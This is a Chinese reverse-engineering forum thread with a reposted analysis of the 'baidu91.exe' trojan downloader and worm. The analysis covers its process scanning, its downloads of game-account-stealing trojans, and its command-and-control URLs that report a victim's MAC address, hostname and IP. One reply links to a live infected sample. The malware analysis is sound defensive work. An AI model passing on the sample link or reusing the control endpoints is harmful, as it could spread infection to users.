吾爱汇编

 找回密码
 立即注册

QQ登录

绑定QQ避免忘记帐号

查看: 2500|回复: 12

[转载技术] 一个病毒的详细分析报告

[复制链接]
Shark恒 发表于 2014-11-5 17:20 | 显示全部楼层 |阅读模式


baidu91.exe 病毒行为分析

病毒信息
名称:baidu91.exe 会下载若干木马文件文件名不一
大小:36 kb
文件类型: PE 文件未加壳
病毒类型:Trojan-Downloader Trojan.Worm
360查杀:未发现木马
文件CRC:0x5D9C690B
概述
    该文件执行后会通过网络获取加密策略,并且通过该策略对指定进程进行遍历,如果发现该进程(游戏),就从指定服务器下载该进程(游戏)的木马文件并且执行。最后发送该主机的相关信息到指定的服务器的页面接口上。
详细分析
利用OD工具载入该程序,在sendrecv处下断点,发现该程序有一下封包的交互行为
174239opdskkfeffzeeeqz.jpg



(图1

1为程序执行之后发送的第一个请求封包。此链接的地址为:http://t.01398.com:5876/c.txt?t=1410761014&mac=080027F168EE&flag=baidu91&name=LIQUAN-FE29EC1&ver=4&os=51&hash=18e98f6603f4970170b878ff6f1bc848


174338tuhuiok6iuon511i.jpg

(图2

2为第一次接收的封包,可见接收到的封包为多行字符串,意义就是某种策略。

174316mq1k7q7k71ukkvmk.jpg



(图3

3:直接运行连接的结果


继续执行代码,走出recv,下断点在程序偏移 0x1D3D处,发现ebp-0x2C变量的所指向的内容为。如图

174317ntff79fz7v9i879m.jpg

(4

程序紧接着进入偏移0xB30处函数中,发现函数的调用顺序为先执行了CreateToolHelp32,紧接着调用了Process32First然后进入循环形成遍历链,条件为Process32Next返回值是否为NULL,这是个经典的遍历进程的代码。走出此函数发现,如果进程不存在则调走,如果进程存在执行下载者。如图遍历函数内容。见(图5
174318sgxzidgrz31jgtcd.jpg



(图5


详细介绍下如果存在该进程的处理方式,如果通过修改内存使这个函数的判断为真(既存在这个进程)执行不跳转的那段代码,返现系统开始进行下载而且不同的进程下载的木马是不同的。比如说:DNF.exe下载的是一个DNF图标的进程,我分析之后发现是盗号木马。而svchost.exe(此进程一般存在)发现下载的是个驱动。见如下图DNF的下载进程情况。

174319i9ewmwxowc0l1wdf.jpg

174319mlvvzmt8vwhvvm6h.jpg
174320i275e7ixej7jjszf.jpg
174321q3mtj3msut33tfu7.jpg

(图6-9

最后无论是什么进程,程序均会往一个六合网站上发用户的主机信息等等。http://s1.01398.com:5898/r.ashx?t=1410761143&mac=080027F168EE&flag=baidu91&ip=192.168.1.106&name=LIQUAN-FE29EC1&run=init&ver=4&os=51&state=0&hash=dc65c382fa1ae3a0ed487e1398061c3f此为链接地址。

10:程序出现蠕虫病毒的现象,像全局域网的系统开始发起入侵。
174322w2quyufoumpqfm2n.jpg



(图10
180521v7ptvtp1eievv73w.jpg
(图11)

程序下载了近20多种木马,危害严重。

总结
程序为一款多功能下载者及蠕虫病毒,可以盗取游戏账号,偷取游戏装备,提升黑客在系统的权限,并且网局域网其他机器发动远程攻击(攻击模式未知,按笔者主机的情况应该是某种缓冲区溢出攻击)

评分

参与人数 18HB +11 THX +11 收起 理由
花盗睡鼠 + 2 + 1 [吾爱汇编论坛52HB.COM]-学破解防破解,知进攻懂防守!
29590 + 1
24567 + 1
Jawon + 1
一路走来不容易 + 1
Soul1999 + 1
Wayne + 1 [吾爱汇编论坛52HB.COM]-软件反汇编逆向分析,软件安全必不可少!
消逝的过去 + 1
小菜虫 + 1 [吾爱汇编论坛52HB.COM]-感谢楼主热心分享,小小评分不成敬意!
xgbnapsua + 2
侠客行 + 1
成丰羽 + 1 [吾爱汇编论坛52HB.COM]-感谢楼主热心分享,小小评分不成敬意!
hackysh + 1
liugu0hai + 1 + 1 [吾爱汇编论坛52HB.COM]-软件反汇编逆向分析,软件安全必不可少!
y_jiping + 1
jaunic + 1
hnymsh + 1
lies + 1

查看全部评分

吾爱汇编论坛-学破解,防破解!知进攻,懂防守!逆向分析,软件安全!52HB.COM
puagin 发表于 2014-11-6 09:12 | 显示全部楼层

这二天我电脑也中招了,可惜没留下样本(准确的说只存了一个自动复制在各盘的EXE文件),全盘EXE感染,重装了二次,,,
附文件(请小朋友不要随便下载):            http://url.cn/fbmCtS      


吾爱汇编论坛-学破解,防破解!知进攻,懂防守!逆向分析,软件安全!52HB.COM
hackysh 发表于 2022-2-18 10:00 | 显示全部楼层


[快捷回复]-感谢楼主热心分享!
吾爱汇编论坛-学破解,防破解!知进攻,懂防守!逆向分析,软件安全!52HB.COM
凌夏随缘 发表于 2022-5-18 14:06 | 显示全部楼层
吾爱汇编论坛-学破解,防破解!知进攻,懂防守!逆向分析,软件安全!52HB.COM
小菜虫 发表于 2022-5-18 16:40 | 显示全部楼层

感谢分享 跟着学习一下
吾爱汇编论坛-学破解,防破解!知进攻,懂防守!逆向分析,软件安全!52HB.COM
雨爱 发表于 2022-5-18 17:00 | 显示全部楼层
吾爱汇编论坛-学破解,防破解!知进攻,懂防守!逆向分析,软件安全!52HB.COM
头像被屏蔽
4957465 发表于 2022-5-19 00:24 | 显示全部楼层

提示: 作者被禁止或删除 内容自动屏蔽
吾爱汇编论坛-学破解,防破解!知进攻,懂防守!逆向分析,软件安全!52HB.COM
头像被屏蔽
4957465 发表于 2022-5-19 01:07 | 显示全部楼层

提示: 作者被禁止或删除 内容自动屏蔽
吾爱汇编论坛-学破解,防破解!知进攻,懂防守!逆向分析,软件安全!52HB.COM
头像被屏蔽
别管我了行 发表于 2022-6-14 02:40 | 显示全部楼层

提示: 作者被禁止或删除 内容自动屏蔽
吾爱汇编论坛-学破解,防破解!知进攻,懂防守!逆向分析,软件安全!52HB.COM
一生逍遥 发表于 2022-11-21 07:34 | 显示全部楼层

论坛遍地大神 666
吾爱汇编论坛-学破解,防破解!知进攻,懂防守!逆向分析,软件安全!52HB.COM
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

警告:本站严惩灌水回复,尊重自己从尊重他人开始!

1层
2层
3层
4层
5层
6层
7层
8层
9层
10层

免责声明

吾爱汇编(www.52hb.com)所讨论的技术及相关工具仅限用于研究学习,皆在提高软件产品的安全性,严禁用于不良动机。任何个人、团体、组织不得将其用于非法目的,否则,一切后果自行承担。吾爱汇编不承担任何因为技术滥用所产生的连带责任。吾爱汇编内容源于网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑中彻底删除。如有侵权请邮件或微信与我们联系处理。

站长邮箱:SharkHeng@sina.com
站长QQ:1140549900


QQ|RSS|手机版|小黑屋|帮助|吾爱汇编 ( 京公网安备11011502005403号 , 京ICP备20003498号-6 )|网站地图

Powered by Discuz!

吾爱汇编 www.52hb.com

快速回复 返回顶部 返回列表